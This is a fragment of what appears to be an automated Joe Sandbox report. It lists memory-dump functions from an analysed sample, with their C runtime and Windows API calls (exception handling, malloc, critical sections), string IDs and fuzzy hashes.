                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: vector<T> too long
                                            • API String ID: 1785806476-3788999226
                                            • Opcode ID: 4ed93cd575f847c483b5bde3c38be2f9ef12f4d42a1ffbb2ca90e3c6851b2da1
                                            • Instruction ID: 4bd98c9a28d0eb0139fdb03ec3603c14e194c1db6204b3a8811e86ade619755a
                                            • Opcode Fuzzy Hash: 4ed93cd575f847c483b5bde3c38be2f9ef12f4d42a1ffbb2ca90e3c6851b2da1
                                            • Instruction Fuzzy Hash: 1C018FB16002069FD728CEB8CC9183BB7E8EB642547944A2DE86BC3640E731F800CB61
                                            APIs
                                              • Part of subcall function 689AABC3: __getptd.LIBCMT ref: 689AABC9
                                              • Part of subcall function 689AABC3: __getptd.LIBCMT ref: 689AABD9
                                            • __getptd.LIBCMT ref: 689ABFC3
                                              • Part of subcall function 689AEAE6: __getptd_noexit.LIBCMT ref: 689AEAE9
                                              • Part of subcall function 689AEAE6: __amsg_exit.LIBCMT ref: 689AEAF6
                                            • __getptd.LIBCMT ref: 689ABFD1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                            • String ID: csm
                                            • API String ID: 803148776-1018135373
                                            • Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                            • Instruction ID: af4a0b5433392f6dee59744a288a07f08fc8ba517ff9e818c990df0f57ed167c
                                            • Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                            • Instruction Fuzzy Hash: 76016938800324CFDF248F61D484AADB3F9BF1831DFE0482EE066AA690CB30C580CB41
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 68965932
                                            • __CxxThrowException@8.LIBCMT ref: 68965947
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                            • String ID: Aj?Q
                                            • API String ID: 4063778783-52356588
                                            • Opcode ID: f063286983b431d750becf48729cb1542d0e6aa8eb2aa260d356591344293658
                                            • Instruction ID: edd7f3b8ef4c71806170e524a7f1069efcfceef63796466815f4d1c70582b601
                                            • Opcode Fuzzy Hash: f063286983b431d750becf48729cb1542d0e6aa8eb2aa260d356591344293658
                                            • Instruction Fuzzy Hash: E8E09B754101099AFB08EFE49C117BFB2BCAF10339FC0066CD93652181EF71D6048656
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: NameName::
                                            • String ID: {flat}
                                            • API String ID: 1333004437-2606204563
                                            • Opcode ID: 03e1d03ae43464595dc4cbe03c8bf6e281a5421a5375276ac3f8de56af37590f
                                            • Instruction ID: 620d78efb682c69cbe3ce29a675d7e1a42a3c0135660fbd857f47fb2d7255471
                                            • Opcode Fuzzy Hash: 03e1d03ae43464595dc4cbe03c8bf6e281a5421a5375276ac3f8de56af37590f
                                            • Instruction Fuzzy Hash: 07F0A0751542489FCB00CF68C054BAE3FE49F82759F848042F85C0F242C772D442D751
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,513F6A41), ref: 689576AD
                                            • LeaveCriticalSection.KERNEL32(?,?,?,513F6A41), ref: 689576FF
                                            • EnterCriticalSection.KERNEL32(513F6A41,?,?,?,513F6A41), ref: 6895770D
                                            • LeaveCriticalSection.KERNEL32(513F6A41,?,00000000,?,?,?,?,513F6A41), ref: 6895772A
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                              • Part of subcall function 68956D40: _rand.LIBCMT ref: 68956DEA
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$_malloc_rand
                                            • String ID:
                                            • API String ID: 119520971-0
                                            • Opcode ID: 1f0b3a90d38050ad65afe83c9586f6e62896cde31acb508fd19da443521ad8c2
                                            • Instruction ID: 814f6ae785e33f26003005555167c41112f2728b07a3b774b944aa7dbfa195b9
                                            • Opcode Fuzzy Hash: 1f0b3a90d38050ad65afe83c9586f6e62896cde31acb508fd19da443521ad8c2
                                            • Instruction Fuzzy Hash: DC2180B6544609AFCB10CF64CC44AAFB7BCFF51255F40462AF82697640EB71EA05CBA1
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?), ref: 689595A9
                                            • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 689595CA
                                            • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 689595DA
                                            • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 689595FB
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: 7de912444307bd38a32a5866f3c65fbe1306343bd0b25c78270bfeed1019b08d
                                            • Instruction ID: 3c183db93e13554cfb44ff5bae39f3f19c822b60b88fd6d82ee01d21a16aaee0
                                            • Opcode Fuzzy Hash: 7de912444307bd38a32a5866f3c65fbe1306343bd0b25c78270bfeed1019b08d
                                            • Instruction Fuzzy Hash: 3211AFB6A04108EFCB00CF99E880CEEF7BCFF51614B40419BE81197610D730EA21CB91